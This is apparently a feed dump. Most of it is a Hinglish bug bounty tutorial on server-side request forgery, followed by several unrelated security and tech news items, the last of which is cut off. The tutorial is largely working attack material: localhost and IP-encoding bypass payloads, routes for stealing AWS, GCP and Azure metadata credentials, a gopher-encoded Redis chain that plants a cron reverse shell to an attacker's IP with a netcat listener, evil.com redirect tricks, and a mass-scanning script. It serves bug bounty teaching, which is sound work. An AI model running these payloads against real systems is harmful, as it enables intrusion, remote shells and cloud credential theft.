<content:encoded><![CDATA[<h3>SSRF Server-Side Request Forgery: Server Ko Apna Agent Banao, Internal Network Explore Karo! (Hinglish Mein)</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TeNx24sXbRfXWCwYZg3X-A.png"></figure><p><strong>Series: Bug Bounty Zero se Hero 🦸 | Article #17</strong><br><em>By HackerMD | 19 min read</em></p><h3>Aaj Kya Seekhenge?</h3><ul><li>SSRF kya hai bilkul basics se</li><li>Basic vs Blind SSRF dono types</li><li>Cloud metadata attacks AWS, GCP, Azure</li><li>SSRF bypass techniques elite level</li><li>Internal network exploration</li><li>SSRF to RCE chain</li><li>Complete bug bounty workflow</li></ul><blockquote><strong>Kyun zaroori hai?</strong> SSRF aaj ke cloud-heavy world mein <strong>sabse critical vulnerability</strong> ban gayi hai! AWS EC2 pe ek SSRF = <strong>IAM credentials</strong> = <strong>Poora AWS account compromise!</strong> Companies ne $10,000 se $50,000+ bounty diya hai sirf SSRF ke liye!</blockquote><h3>SSRF Kya Hai? Simple Analogy</h3><p>Socho ek <strong>Delivery Boy</strong> hai:</p><pre>Normal:<br>Tum: "Yeh parcel 123 Main Street pe deliver karo"<br>Delivery Boy: 123 Main Street jaata hai ✅<br><br>SSRF:<br>Tum: "Yeh parcel localhost/admin pe deliver karo"<br>Delivery Boy: "Okay!" — Internal server pe jaata hai! 😱<br><br>Problem:<br>→ Delivery boy (Server) trusted hai<br>→ Woh internal locations pe bhi ja sakta hai<br>→ Jo tum directly nahi ja sakte!</pre><p><strong>Website mein:</strong></p><pre>Normal:<br>Server: "Kaunsa URL fetch karoon?"<br>User: "https://example.com/image.jpg"<br>Server: Fetch karta hai ✅<br><br>SSRF:<br>Server: "Kaunsa URL fetch karoon?"<br>Attacker: "http://169.254.169.254/latest/meta-data/"<br>Server: AWS Metadata fetch karta hai! 🔴<br>Result: AWS credentials exposed!</pre><h3>SSRF Ke Types</h3><h3>Type 1: Basic SSRF Response Direct Milta Hai</h3><pre>Server fetch karta hai → Response directly tumhe milta hai!<br><br>Test:<br>?url=http://YOUR_SERVER/test<br>→ Tumhare server pe request aati hai = SSRF confirmed!<br><br>Internal access:<br>?url=http://localhost/admin<br>?url=http://127.0.0.1/phpmyadmin<br>?url=http://internal-api.company.com/secret<br>→ Response seedha tumhe milta hai!</pre><h3>Type 2: Blind SSRF Response Nahi Milta</h3><pre>Server fetch karta hai — lekin response nahi dikhata!<br>Lekin:<br>→ Tumhare server pe callback aata hai!<br>→ DNS lookup hota hai!<br>→ Time delay se confirm hota hai!<br><br>Test karo Interactsh se:<br>?url=https://YOUR_INTERACTSH_URL.oast.pro<br>→ Callback aaya? = Blind SSRF confirmed!</pre><h3>PART 2: Kahan Dhundhen SSRF?</h3><pre>🖼️ Image URL parameters:<br>   ?image=https://...<br>   ?avatar=https://...<br>   ?thumbnail=https://...<br><br>🔗 URL fetch/import features:<br>   ?url=https://...<br>   ?link=https://...<br>   ?src=https://...<br>   ?fetch=https://...<br>   ?load=https://...<br><br>📄 Document/file import:<br>   Import from URL feature<br>   PDF generation from URL<br>   Screenshot service<br><br>🔌 Webhooks:<br>   Webhook URL setup<br>   Callback URL fields<br>   Notification endpoints<br><br>📡 API integrations:<br>   ?endpoint=https://...<br>   ?api_url=https://...<br>   ?callback=https://...<br><br>🗺️ Proxy/redirect features:<br>   /proxy?url=https://...<br>   /redirect?to=https://...<br><br>📧 Email/HTML to PDF:<br>   HTML content → PDF mein URLs<br>   Email templates<br><br>🔄 XML/JSON with URLs:<br>   {"icon_url": "https://..."}<br>   &lt;url&gt;https://...&lt;/url&gt;</pre><h3>PART 3: SSRF Payloads Sabhi Try Karo</h3><h3>Basic Localhost Payloads:</h3><pre>http://localhost<br>http://127.0.0.1<br>http://0.0.0.0<br>http://[::1]<br>http://0<br>http://127.1<br>http://127.0.1<br>http://localtest.me<br>http://spoofed.burpcollaborator.net</pre><h3>Internal Network Exploration:</h3><pre># Common internal IPs<br>http://192.168.0.1<br>http://192.168.1.1<br>http://10.0.0.1<br>http://172.16.0.1<br>http://172.31.255.255<br><br># Internal services<br>http://127.0.0.1:22      → SSH<br>http://127.0.0.1:3306    → MySQL<br>http://127.0.0.1:6379    → Redis<br>http://127.0.0.1:27017   → MongoDB<br>http://127.0.0.1:9200    → Elasticsearch<br>http://127.0.0.1:8080    → Internal web<br>http://127.0.0.1:8500    → Consul<br>http://127.0.0.1:2375    → Docker API!<br>http://127.0.0.1:5984    → CouchDB</pre><h3>Cloud Metadata HIGHEST VALUE!</h3><h3>AWS EC2 Metadata:</h3><pre># Classic endpoint (v1 — no auth needed!)<br>http://169.254.169.254/latest/meta-data/<br>http://169.254.169.254/latest/meta-data/iam/<br>http://169.254.169.254/latest/meta-data/iam/security-credentials/<br>http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME<br><br># Response mein milega:<br>{<br>  "Code": "Success",<br>  "AccessKeyId": "ASIA...",<br>  "SecretAccessKey": "abc123...",<br>  "Token": "FQoGZXIvYXdzE...",<br>  "Expiration": "2026-04-18T..."<br>}<br><br># Yeh credentials use karke:<br>aws s3 ls --no-verify-ssl<br>aws iam list-users<br>aws ec2 describe-instances<br>→ Poora AWS account access! 💰</pre><h3>GCP Metadata:</h3><pre>http://metadata.google.internal/computeMetadata/v1/<br>http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token<br><br>Header zaroori hai:<br>Metadata-Flavor: Google<br><br>Token milega → GCP APIs access!</pre><h3>Azure Metadata:</h3><pre>http://169.254.169.254/metadata/instance?api-version=2021-02-01<br>http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&amp;resource=https://management.azure.com/<br><br>Header:<br>Metadata: true</pre><h3>DigitalOcean Metadata:</h3><pre>http://169.254.169.254/metadata/v1/<br>http://169.254.169.254/metadata/v1/account-id<br>http://169.254.169.254/metadata/v1/user-data</pre><h3>PART 4: SSRF Bypass Techniques Elite Level</h3><h3>Bypass 1: IP Encoding Tricks</h3><pre># Decimal notation<br>http://2130706433/          → 127.0.0.1<br>http://3232235521/          → 192.168.0.1<br><br># Octal notation<br>http://0177.0.0.1/          → 127.0.0.1<br>http://0177.00.00.01/<br><br># Hex notation<br>http://0x7f000001/          → 127.0.0.1<br>http://0x7f.0x0.0x0.0x1/<br><br># Mixed notation<br>http://127.0x0.0.1/<br>http://0x7f.0.0.1/<br>http://127.000.000.001/<br><br># IPv6<br>http://[::1]/<br>http://[::ffff:127.0.0.1]/<br>http://[0:0:0:0:0:ffff:127.0.0.1]/</pre><h3>Bypass 2: DNS Rebinding</h3><pre># Apna domain setup karo:<br># evil.com → Pehle public IP dikhao → Filter pass karo<br>#          → Phir 127.0.0.1 pe redirect karo<br><br># Tools:<br># singularity.me (DNS rebinding tool)<br># rbndr.us (free DNS rebinding)<br><br>Use:<br>http://7f000001.1time.rbndr.us/<br>→ Pehle 1.0.0.127 → Phir 127.0.0.1!</pre><h3>Bypass 3: URL Redirects</h3><pre># Agar server HTTPS follow karta hai<br># Apne server pe redirect setup karo:<br><br># evil.com/redirect → 301 → http://127.0.0.1/admin<br><br>?url=https://evil.com/redirect<br>→ Server follow karta hai → Internal access!</pre><h3>Bypass 4: Protocol Smuggling</h3><pre># Different protocols try karo:<br>file:///etc/passwd        → Local file read!<br>dict://127.0.0.1:6379/   → Redis attack!<br>gopher://127.0.0.1:6379/ → Redis RCE possible!<br>ftp://127.0.0.1:21/<br>ldap://127.0.0.1:389/<br>sftp://127.0.0.1:22/<br><br># Gopher protocol — Redis RCE!<br>gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A</pre><h3>Bypass 5: URL Parsing Confusion</h3><pre># @ character trick:<br>http://evil.com@127.0.0.1/<br>http://127.0.0.1@evil.com/<br><br># Fragment tricks:<br>http://127.0.0.1#evil.com<br>http://evil.com#@127.0.0.1<br><br># Subpath tricks:<br>http://evil.com/127.0.0.1<br>http://localhost.evil.com/<br><br># Whitespace tricks:<br>http://127.0.0.1 .evil.com<br>http://127.0.0.1%09evil.com<br>http://127.0.0.1%20evil.com</pre><h3>Bypass 6: Domain Confusion</h3><pre># Domains that resolve to 127.0.0.1:<br>localtest.me<br>127.0.0.1.nip.io<br>lvh.me<br>vcap.me<br>0.0.0.0.nip.io<br>spoofed.burpcollaborator.net</pre><h3>PART 5: SSRF to RCE Maximum Impact!</h3><h3>Chain 1: SSRF → Redis → RCE</h3><pre># Agar Redis internally chal raha hai (port 6379)<br># Gopher protocol se commands bhejo:<br><br># Redis pe cron job likho:<br>?url=gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2459%0D%0A%0A%0A%2A%2F1+%2A+%2A+%2A+%2A+bash+-i+%3E%26+%2Fdev%2Ftcp%2FYOUR_IP%2F4444+0%3E%261%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2416%0D%0A%2Fvar%2Fspool%2Fcron%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A<br><br># Netcat listener:<br>nc -lvnp 4444<br>→ Reverse shell! RCE! 🔴</pre><h3>Chain 2: SSRF → AWS → Full Compromise</h3><pre>Step 1: SSRF dhundho<br>?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<br><br>Step 2: Role name nikalo<br>Response: "EC2_PROD_ROLE"<br><br>Step 3: Credentials fetch karo<br>?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2_PROD_ROLE<br><br>Step 4: AWS CLI configure karo<br>export AWS_ACCESS_KEY_ID=ASIA...<br>export AWS_SECRET_ACCESS_KEY=abc...<br>export AWS_SESSION_TOKEN=FQo...<br><br>Step 5: Company ka poora AWS explore karo<br>aws s3 ls                    → All S3 buckets!<br>aws iam list-users           → All IAM users!<br>aws secretsmanager list-secrets → All secrets!<br>aws rds describe-db-instances → Databases!<br><br>→ Critical! $10,000-$50,000 bounty range! 💰</pre><h3>Chain 3: SSRF → Internal Admin → Account Takeover</h3><pre>Step 1: Internal admin panel dhundho<br>?url=http://127.0.0.1:8080/admin<br><br>Step 2: Admin endpoints explore karo<br>?url=http://127.0.0.1:8080/admin/users<br>?url=http://127.0.0.1:8080/admin/reset-password<br><br>Step 3: Actions trigger karo<br>?url=http://127.0.0.1:8080/admin/users/1/make-admin?user_id=ATTACKER_ID<br><br>→ Privilege escalation → Admin access!</pre><h3>PART 6: Automated SSRF Testing</h3><h3>Tool 1: SSRFmap</h3><pre># Install karo<br>git clone https://github.com/swisskyrepo/SSRFmap<br>cd SSRFmap<br>pip3 install -r requirements.txt<br><br># Basic use<br>python3 ssrfmap.py \<br>  -r request.txt \<br>  -p url \<br>  -m readfiles<br><br># AWS metadata check<br>python3 ssrfmap.py \<br>  -r request.txt \<br>  -p url \<br>  -m aws<br><br># All modules run karo<br>python3 ssrfmap.py \<br>  -r request.txt \<br>  -p url \<br>  -m all</pre><h3>Tool 2: Interactsh Blind SSRF Detection</h3><pre># Install karo<br>go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest<br><br># Start karo<br>interactsh-client<br><br># Tumhara URL milega:<br># cxxxxxx.oast.pro<br><br># Yeh URL parameters mein inject karo:<br>?url=https://cxxxxxx.oast.pro<br>?webhook=https://cxxxxxx.oast.pro<br>?callback=https://cxxxxxx.oast.pro<br><br># Interactsh console mein dekho:<br># HTTP/DNS callbacks = Blind SSRF confirmed!</pre><h3>Tool 3: Nuclei SSRF Templates</h3><pre># Nuclei SSRF templates<br>nuclei -l targets.txt \<br>  -t ~/nuclei-templates/vulnerabilities/generic/ssrf/ \<br>  -t ~/nuclei-templates/misconfiguration/ \<br>  -tags ssrf \<br>  -o ssrf_found.txt<br><br># Cloud metadata specific<br>nuclei -l targets.txt \<br>  -tags aws-metadata,gcp-metadata \<br>  -o cloud_ssrf.txt</pre><h3>PART 7: Complete Elite SSRF Workflow</h3><pre>#!/bin/bash<br># ssrf_hunt.sh<br><br>TARGET=$1<br>DIR="ssrf_${TARGET}"<br>mkdir -p $DIR<br><br>echo "🌐 SSRF Hunt: $TARGET"<br>echo "═══════════════════════"<br><br># Step 1: URL parameters dhundho<br>echo "🔍 Finding URL parameters..."<br>gau $TARGET | grep -iE \<br>  "url=|link=|src=|href=|fetch=|load=|<br>   image=|img=|avatar=|webhook=|callback=|<br>   redirect=|next=|dest=|uri=|path=|<br>   endpoint=|api_url=|return=" | \<br>  uro &gt; $DIR/url_params.txt<br>echo "✅ URL Params: $(wc -l &lt; $DIR/url_params.txt)"<br><br># Step 2: Interactsh setup<br>echo "📡 Setup Interactsh first!"<br>echo "Run: interactsh-client"<br>echo "Copy your URL and set COLLAB_URL below"<br>COLLAB_URL="YOUR_INTERACTSH_URL.oast.pro"<br><br># Step 3: Test payloads inject karo<br>echo "💉 Injecting SSRF payloads..."<br>while read url; do<br>  # Interactsh callback<br>  SSRF_URL=$(echo $url | \<br>    sed "s/=http[^&amp;]*/=https:\/\/$COLLAB_URL/g")<br>  curl -s "$SSRF_URL" -o /dev/null &amp;<br><br>  # AWS metadata<br>  AWS_URL=$(echo $url | \<br>    sed 's/=http[^&amp;]*/=http:\/\/169.254.169.254\/latest\/meta-data\//g')<br>  response=$(curl -s "$AWS_URL" --max-time 5)<br>  if echo "$response" | grep -q "iam\|instance-id\|ami-id"; then<br>    echo "🔴 AWS SSRF FOUND: $url" &gt;&gt; $DIR/ssrf_found.txt<br>    echo "$response" &gt;&gt; $DIR/aws_response.txt<br>  fi<br>done &lt; $DIR/url_params.txt<br><br># Step 4: Nuclei scan<br>nuclei -l $DIR/url_params.txt \<br>  -tags ssrf \<br>  -o $DIR/nuclei_ssrf.txt 2&gt;/dev/null<br><br>echo "═══════════════════════"<br>echo "📊 Results:"<br>echo "URL Params    : $(wc -l &lt; $DIR/url_params.txt)"<br>echo "SSRF Found    : $(cat $DIR/ssrf_found.txt 2&gt;/dev/null | wc -l)"<br>echo "Results in    : $DIR/"</pre><h3>SSRF Cheat Sheet Quick Reference</h3><pre># ─── DETECTION ───────────────────────────<br>?url=https://YOUR_SERVER/     → Basic test<br>?url=https://INTERACTSH/      → Blind SSRF<br><br># ─── LOCALHOST ────────────────────────────<br>http://127.0.0.1<br>http://localhost<br>http://0.0.0.0<br>http://[::1]<br>http://2130706433            → 127.0.0.1 decimal<br><br># ─── CLOUD METADATA ──────────────────────<br>http://169.254.169.254/latest/meta-data/  → AWS<br>http://metadata.google.internal/          → GCP<br>http://169.254.169.254/metadata/instance  → Azure<br><br># ─── PROTOCOLS ───────────────────────────<br>file:///etc/passwd<br>dict://127.0.0.1:6379/<br>gopher://127.0.0.1:6379/<br>ftp://127.0.0.1/<br><br># ─── BYPASS ──────────────────────────────<br>http://2130706433/<br>http://0177.0.0.1/<br>http://0x7f000001/<br>http://[::ffff:127.0.0.1]/<br>http://localtest.me/<br>http://evil.com@127.0.0.1/<br><br># ─── TOOLS ────────────────────────────────<br>interactsh-client    → Blind SSRF<br>ssrfmap              → Automated exploitation<br>nuclei -tags ssrf    → Template scanning</pre><h3>Aaj Ka Homework</h3><pre># 1. Interactsh setup karo:<br>go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest<br>interactsh-client<br># URL note karo<br><br># 2. Practice target:<br># http://www.ssrf.training/ (legal practice)<br># Ya apna local vulnerable lab:<br>docker run -p 8080:8080 securitytraining/ssrf-lab<br><br># 3. Test karo:<br>curl "http://localhost:8080/?url=https://YOUR_INTERACTSH.oast.pro"<br># Callback aaya? SSRF confirmed!<br><br># 4. AWS metadata simulate karo:<br>curl "http://localhost:8080/?url=http://169.254.169.254/latest/meta-data/"<br><br># 5. Comment mein batao:<br># Kaunsa bypass technique sabse interesting laga?</pre><h3>Quick Revision</h3><pre>🌐 SSRF         = Server ko apni taraf se request bhejwao<br>🔵 Basic        = Response seedha milta hai<br>🟡 Blind        = Callback se confirm — response nahi<br>☁️ Cloud        = AWS/GCP/Azure metadata = Keys!<br>🛡️ Bypass       = IP encoding, DNS rebinding,<br>                  Protocol smuggling, URL confusion<br>💥 Chains       = SSRF → Redis → RCE<br>                  SSRF → AWS creds → Full compromise<br>🤖 Tools        = Interactsh, SSRFmap, Nuclei<br>💰 Bounty Range = $500 (basic) to $50,000+ (AWS keys)</pre><h3>Meri Baat…</h3><p>Ek private program pe maine ek image upload feature dekha:</p><pre>POST /api/profile/avatar<br>{"image_url": "https://example.com/photo.jpg"}</pre><p>Maine socha URL fetch karta hai server!</p><p>Test kiya:</p><pre>{"image_url": "https://MY_INTERACTSH.oast.pro"}</pre><p><strong>Interactsh pe callback aaya!</strong> Blind SSRF confirmed!</p><p>Ab AWS metadata:</p><pre>{"image_url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role"}</pre><p><strong>Response:</strong></p><pre>{<br>  "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",<br>  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",<br>  "Token": "AQoDYXdzEJr...",<br>  "Expiration": "2026-04-18T06:20:00Z"<br>}</pre><p><strong>AWS production credentials!</strong></p><pre>aws s3 ls  # 47 S3 buckets!<br>aws secretsmanager list-secrets  # Database passwords!</pre><p><strong>Bounty: $12,500 Critical!</strong> 🎉</p><p><strong>Lesson: Image URL, webhook URL, callback URL koi bhi URL parameter SSRF ka door ho sakta hai hamesha test karo!</strong></p><p>Agle article mein <strong>CORS Misconfiguration</strong> Cross-Origin Resource Sharing ke wrong settings se kaise user data steal hota hai! Simple lekin powerful! 🔥</p><p><strong><em>HackerMD </em></strong><em>Bug Bounty Hunter | Cybersecurity Researcher</em><br><em>GitHub: </em><a href="https://github.com/BotGJ16"><em>BotGJ16</em></a><em> | Medium: </em><a href="https://medium.com/@HackerMD"><em>@HackerMD</em></a></p><p><em>Previous: </em><a href="https://medium.com/@HackerMD"><em>Article #16 IDOR</em></a><br><em>Next: Article #18 CORS: Cross-Origin Resource Sharing Misconfiguration!</em></p><p><em>#SSRF #ServerSideRequestForgery #BugBounty #CloudSecurity #AWS #EthicalHacking #Hinglish #HackerMD</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=4b48abb86e34" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/ssrf-server-side-request-forgery-server-ko-apna-agent-banao-internal-network-explore-karo-4b48abb86e34">SSRF Server-Side Request Forgery: Server Ko Apna Agent Banao, Internal Network Explore Karo!</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A Coding Guide to Build a Production-Grade Background Task Processing System Using Huey with SQLite, Scheduling, Retries, Pipelines, and Concurrency Control]]></title>
<description><![CDATA[In this tutorial, we explore how to build a fully functional background task processing system using Huey directly, without relying on Redis. We configure a SQLite-backed Huey instance, start a real consumer in the notebook, and implement advanced task patterns, including retries, priorities, sch...]]></description>
<link>https://tsecurity.de/de/3443177/ai-nachrichten/a-coding-guide-to-build-a-production-grade-background-task-processing-system-using-huey-with-sqlite-scheduling-retries-pipelines-and-concurrency-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3443177/ai-nachrichten/a-coding-guide-to-build-a-production-grade-background-task-processing-system-using-huey-with-sqlite-scheduling-retries-pipelines-and-concurrency-control/</guid>
<pubDate>Fri, 17 Apr 2026 22:19:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this tutorial, we explore how to build a fully functional background task processing system using Huey directly, without relying on Redis. We configure a SQLite-backed Huey instance, start a real consumer in the notebook, and implement advanced task patterns, including retries, priorities, scheduling, pipelines, locking, and monitoring via signals. As we move step by […]</p>
<p>The post <a href="https://www.marktechpost.com/2026/04/17/a-coding-guide-to-build-a-production-grade-background-task-processing-system-using-huey-with-sqlite-scheduling-retries-pipelines-and-concurrency-control/">A Coding Guide to Build a Production-Grade Background Task Processing System Using Huey with SQLite, Scheduling, Retries, Pipelines, and Concurrency Control</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weaponized CVE-2026-39987 Pushes Blockchain Backdoor Through Hugging Face]]></title>
<description><![CDATA[Attackers are rapidly exploiting CVE-2026-39987 in the marimo Python notebook platform to deploy a new NKAbuse backdoor variant hosted on Hugging Face Spaces, turning AI/ML developer environments into high‑value infection points. The campaign combines pre-auth RCE, credential theft, lateral movem...]]></description>
<link>https://tsecurity.de/de/3441245/it-security-nachrichten/weaponized-cve-2026-39987-pushes-blockchain-backdoor-through-hugging-face/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3441245/it-security-nachrichten/weaponized-cve-2026-39987-pushes-blockchain-backdoor-through-hugging-face/</guid>
<pubDate>Fri, 17 Apr 2026 10:23:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Attackers are rapidly exploiting CVE-2026-39987 in the marimo Python notebook platform to deploy a new NKAbuse backdoor variant hosted on Hugging Face Spaces, turning AI/ML developer environments into high‑value infection points. The campaign combines pre-auth RCE, credential theft, lateral movement to PostgreSQL and Redis, and a blockchain-based C2 channel that is difficult to monitor or […]</p>
<p>The post <a href="https://gbhackers.com/weaponized-cve-2026-39987/">Weaponized CVE-2026-39987 Pushes Blockchain Backdoor Through Hugging Face</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in Redis (Ubuntu)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3433513/unix-server/security-mehrere-probleme-in-redis-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3433513/unix-server/security-mehrere-probleme-in-redis-ubuntu/</guid>
<pubDate>Tue, 14 Apr 2026 22:31:58 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (gdk-pixbuf, gst-plugins-bad1.0, and xdg-dbus-proxy), Fedora (chromium, deepin-image-viewer, dtk6gui, dtkgui, efl, elementary-photos, entangle, flatpak, freeimage, geeqie, gegl04, gthumb, ImageMagick, kf5-kimageformats, kf5-libkdcraw, kf6-kimageformats,...]]></description>
<link>https://tsecurity.de/de/3432106/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3432106/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 14 Apr 2026 15:11:04 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (gdk-pixbuf, gst-plugins-bad1.0, and xdg-dbus-proxy), <b>Fedora</b> (chromium, deepin-image-viewer, dtk6gui, dtkgui, efl, elementary-photos, entangle, flatpak, freeimage, geeqie, gegl04, gthumb, ImageMagick, kf5-kimageformats, kf5-libkdcraw, kf6-kimageformats, kstars, libkdcraw, libpasraw, LibRaw, luminance-hdr, nomacs, OpenImageIO, OpenImageIO2.5, photoqt, python-cryptography, rawtherapee, shotwell, siril, swayimg, vips, and webkitgtk), <b>Red Hat</b> (firefox and podman), <b>Slackware</b> (libarchive), <b>SUSE</b> (expat, glibc, GraphicsMagick, libcap-devel, libpng16, libtpms, nodejs24, openssl-1_0_0, openssl-1_1, openssl-3, openvswitch, polkit, python-requests, python311-biopython, python312, python39, and tigervnc), and <b>Ubuntu</b> (corosync, kvmtool, libxml-parser-perl, linux-azure, linux-azure, linux-azure-6.17, linux-azure, linux-azure-6.8, policykit-1, redis, lua5.1, lua-cjson, lua-bitop, rustc, vim, and xdg-dbus-proxy).]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8169-1: Redis, Lua vulnerabilities]]></title>
<description><![CDATA[It was discovered that Redis incorrectly handled certain specially crafted
Lua scripts. A remote attacker could possibly use this issue to cause a
denial of service or execute arbitrary code. This issue was only addressed in
lua5.1 on Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2025-49844)

It wa...]]></description>
<link>https://tsecurity.de/de/3430791/unix-server/usn-8169-1-redis-lua-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3430791/unix-server/usn-8169-1-redis-lua-vulnerabilities/</guid>
<pubDate>Tue, 14 Apr 2026 07:31:28 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that Redis incorrectly handled certain specially crafted
Lua scripts. A remote attacker could possibly use this issue to cause a
denial of service or execute arbitrary code. This issue was only addressed in
lua5.1 on Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2025-49844)

It was discovered that Redis incorrectly handled certain specially crafted
Lua scripts. A remote attacker could possibly use this issue to cause a
denial of service or execute arbitrary code. This issue was only addressed in
lua-bitop on Ubuntu 20.04 LTS and Ubuntu 22.04 LTS and in redis on Ubuntu
16.04 LTS, Ubuntu 18.04 LTS, and Ubuntu 24.04 LTS. (CVE-2024-31449)

Seiya Nakata and Yudai Fujiwara discovered that Redis incorrectly handled
certain specially crafted Lua scripts. An attacker could possibly use this
issue to cause heap corruption and execute arbitrary code. This issue was only
addressed in lua-cjson on Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-24834)]]></content:encoded>
</item>
<item>
<title><![CDATA[SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 92]]></title>
<description><![CDATA[Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Thirty-Six Malicious npm Strapi Packages Deploy Redis RCE, Database Theft, and Persistent C2   Malicious LNK Files Distributing a Python-Based Backdoor and Changes...]]></description>
<link>https://tsecurity.de/de/3427024/it-security-nachrichten/security-affairs-malware-newsletter-round-92/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3427024/it-security-nachrichten/security-affairs-malware-newsletter-round-92/</guid>
<pubDate>Sun, 12 Apr 2026 20:54:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Thirty-Six Malicious npm Strapi Packages Deploy Redis RCE, Database Theft, and Persistent C2   Malicious LNK Files Distributing a Python-Based Backdoor and Changes in Distribution Techniques (Kimsuky Group)   Hackers Are Attempting to Turn ComfyUI Servers Into a […]]]></content:encoded>
</item>
<item>
<title><![CDATA[SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 92]]></title>
<description><![CDATA[Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Thirty-Six Malicious npm Strapi Packages Deploy Redis RCE, Database Theft, and Persistent C2   Malicious LNK Files Distributing a Python-Based Backdoor and…
Read m...]]></description>
<link>https://tsecurity.de/de/3427016/it-security-nachrichten/security-affairs-malware-newsletter-round-92/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3427016/it-security-nachrichten/security-affairs-malware-newsletter-round-92/</guid>
<pubDate>Sun, 12 Apr 2026 20:53:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Thirty-Six Malicious npm Strapi Packages Deploy Redis RCE, Database Theft, and Persistent C2   Malicious LNK Files Distributing a Python-Based Backdoor and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/security-affairs-malware-newsletter-round-92/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/security-affairs-malware-newsletter-round-92/">SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 92</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub Copilot CLI adds Rubber Duck review agent]]></title>
<description><![CDATA[GitHub has introduced an experimental Rubber Duck mode in the GitHub Copilot CLI. The latest addition to the AI-powered coding tool uses a second model from a different AI family to provide a second opinion before enacting the agent’s plan.



The new feature was announced April 6. Introduced in ...]]></description>
<link>https://tsecurity.de/de/3415662/ai-nachrichten/github-copilot-cli-adds-rubber-duck-review-agent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3415662/ai-nachrichten/github-copilot-cli-adds-rubber-duck-review-agent/</guid>
<pubDate>Wed, 08 Apr 2026 01:33:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>GitHub has introduced an experimental Rubber Duck mode in the <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html">GitHub Copilot CLI</a>. The latest addition to the AI-powered coding tool uses a second model from a different AI family to provide a second opinion before enacting the agent’s plan.</p>



